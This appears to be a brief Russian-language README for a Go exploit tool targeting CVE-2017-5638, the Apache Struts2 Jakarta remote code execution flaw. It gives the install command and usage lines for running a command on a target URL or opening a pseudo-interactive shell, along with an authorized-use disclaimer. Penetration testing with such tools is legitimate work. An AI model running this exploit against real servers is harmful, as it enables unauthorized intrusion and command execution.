
Эксплойт на Golang для CVE-2017-5638
Используйте этот эксплойт только на системах, которыми вы владеете или имеете явное разрешение на тестирование
Если у вас уже установлен Go на компьютере, лучше всего использовать go get
go get github.com/Greynad/struts2-jakarta-inject
Выполнение одной команды
struts2-jakarta-inject -u <url> -c 'id'
Псевдоинтерактивная оболочка
struts2-jakarta-inject -u <url> -i